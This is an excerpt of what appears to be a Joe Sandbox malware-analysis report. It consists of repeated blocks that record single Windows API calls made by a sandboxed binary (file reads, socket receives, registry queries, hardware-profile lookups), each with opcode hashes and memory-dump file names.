• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 2cf633d664c77f324ec7598e35559c83902c4fa31a4fae02eeb5ded1a0d98cf8
• Instruction ID: 9ea92d9f785d14e1f87feaab6690cc9bddbe39b4cb883192013e7fb7717599b8
• Opcode Fuzzy Hash: 2cf633d664c77f324ec7598e35559c83902c4fa31a4fae02eeb5ded1a0d98cf8
• Instruction Fuzzy Hash: C2E06575204202EFC348CF14D8C0E5AB7B9FF49300F01456DE901CB261E7B0A880CF92
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c26b6679ef2b96923ee5fbd9e6368894b4bedd977cf751cd5a3767e5c7d6b841
• Instruction ID: 790e08f4817875435399588cb89aa9c07f2d3dc702fbb2cdf1cf53b7f6f4bfce
• Opcode Fuzzy Hash: c26b6679ef2b96923ee5fbd9e6368894b4bedd977cf751cd5a3767e5c7d6b841
• Instruction Fuzzy Hash: 27E06D725146108BD300DF68DD9036977F1FF94218F09462CC850A31B1EBB4AA9ACB86
APIs
• GetCurrentHwProfileA.ADVAPI32(?), ref: 00431091
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CurrentProfile
• String ID:
• API String ID: 2104809126-0
• Opcode ID: 5c79d7a4dfda38c70779f91f274cc9801959aa902c3fd4f34b2b491e23c98db7
• Instruction ID: 4e38f094da93f91ee93a3b753f4728bb631030d9733e544911c6ba1f3b56ea36
• Opcode Fuzzy Hash: 5c79d7a4dfda38c70779f91f274cc9801959aa902c3fd4f34b2b491e23c98db7
• Instruction Fuzzy Hash: C1E0C2762022005BE324DF39ECA0E9B37A8AFC2744F01483CEA5587355EB70E80487D2
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041E17C
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 6688a45f4184328566aac6b4ed74be48bb7a3c21e4cc4a6ed1afa1550693238d
• Instruction ID: c7c5c17831e90324ed4afa5d11201efbc2ca3822ba6762b099c39e5697bc238f
• Opcode Fuzzy Hash: 6688a45f4184328566aac6b4ed74be48bb7a3c21e4cc4a6ed1afa1550693238d
• Instruction Fuzzy Hash: 54E0CD75B012016BD700CF69DD90AEB7B3AEFC4200F1C8414E501E7254EA70A812C754
APIs
• recv.WS2_32(?,?,00001000,00000000), ref: 0041B424
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: recv
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                        • Opcode ID: caad673fedd87d4856dd1157f87e00702ba0b3420d41bb5e536a51b9e100c0fb
                                                                                                                                                                        • Instruction ID: aead8b8d50fb7840cfb2a962f70a832c4e1e8eaf575e56f7ff135d4e5528414a
                                                                                                                                                                        • Opcode Fuzzy Hash: caad673fedd87d4856dd1157f87e00702ba0b3420d41bb5e536a51b9e100c0fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE012713042049BE765DB1CCD55F5272D4A784344F040429F559CB382EBA4EC118759
APIs
• RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 004319AD
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 55fafbb745de52f37c2e54d196e5d7b3474cf04051da483c2763e667d4adef85
• Instruction ID: 0f8d8d2c4aa481d8294781b734d66185b22faf5e27e84ddd18bef5484c15063d
• Opcode Fuzzy Hash: 55fafbb745de52f37c2e54d196e5d7b3474cf04051da483c2763e667d4adef85
• Instruction Fuzzy Hash: 61E0EC36644000AFCA219B5DEC48C9A7B75EBCAB09B448479F5C146230D6715925DB62
APIs
• InternetReadFile.WININET(?,?,000007CF,?), ref: 004156A6
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 643b88a5ea669c3f658c673bb12741f48ec1ce850c4aea71cb35032df8244005
• Instruction ID: 9f5938fca2b3dfc9c7298c4946ac386d7705a1478a4a7384f001f340b41cb7d4
• Opcode Fuzzy Hash: 643b88a5ea669c3f658c673bb12741f48ec1ce850c4aea71cb35032df8244005
• Instruction Fuzzy Hash: E4E0EC31B0410ADFDB08DF14CDA9D9677BBFF887047204458E5099B169EAB0BE06CF95
APIs
• InternetReadFile.WININET(?,?,000000C7,?), ref: 00417721
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 30f4bd5ea8fd804b778e080960fc29e2a21135f07ef5fa9cad9cf84069eb747d
• Instruction ID: 897980dddf20cb38dc0a6acb9985aec6eb2c8e98df4fb9227e8a1d99487b72db
• Opcode Fuzzy Hash: 30f4bd5ea8fd804b778e080960fc29e2a21135f07ef5fa9cad9cf84069eb747d
• Instruction Fuzzy Hash: C8E0B6B160061BDFDB08CF40CC95D6A336AFB94704B258569E5019B255F6A1A946CB80
APIs
• InternetReadFile.WININET(?,?,000007CF,?), ref: 004169CD
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: fdb34fb5765534ad1be066e353eac3e777020ca7a94341d98781c47ce708297b
                                                                                                                                                                        • Instruction ID: e67d891b9b41ce4889a9a502cda52c0fc0ea7c6753f145824986adfaef5e1314
                                                                                                                                                                        • Opcode Fuzzy Hash: fdb34fb5765534ad1be066e353eac3e777020ca7a94341d98781c47ce708297b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE08C7170420A9FDF08DB10DC89D867777FBC4705B204A5CE410AB250EA70A907CB40
                                                                                                                                                                        APIs
                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 0041AFF2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                                                        • Opcode ID: dead2f6ea5f43f602b10022a8e9819915a478e7393a3c685078b224727a79d14
                                                                                                                                                                        • Instruction ID: d49d51e8e7057c320cd1e83a91f227be925c56538ff9a38844aff0f3c62bd3e1
                                                                                                                                                                        • Opcode Fuzzy Hash: dead2f6ea5f43f602b10022a8e9819915a478e7393a3c685078b224727a79d14
                                                                                                                                                                        • Instruction Fuzzy Hash: C2D05B7034451057DA28D71CCD51B177253ABC0764F244A19F1255F3D2E7F55C514745
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0066C297,00000000,00020119), ref: 00431268
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: bcc0e8d44c410ac47834b993ae4d33632993930fb0a1bb375e1f765b45e8fc7b
                                                                                                                                                                        • Instruction ID: 6d540d9a666b1ce77cc5993873b9170c6c0be28dcee01b855a3900b9505d3003
                                                                                                                                                                        • Opcode Fuzzy Hash: bcc0e8d44c410ac47834b993ae4d33632993930fb0a1bb375e1f765b45e8fc7b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD0C274313A00DFEB148F19DC49F547771EB8C351F10005DF500571A1C7719810CA56
                                                                                                                                                                        APIs
                                                                                                                                                                        • recv.WS2_32(?,?,00001000,00000000), ref: 0041B7CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
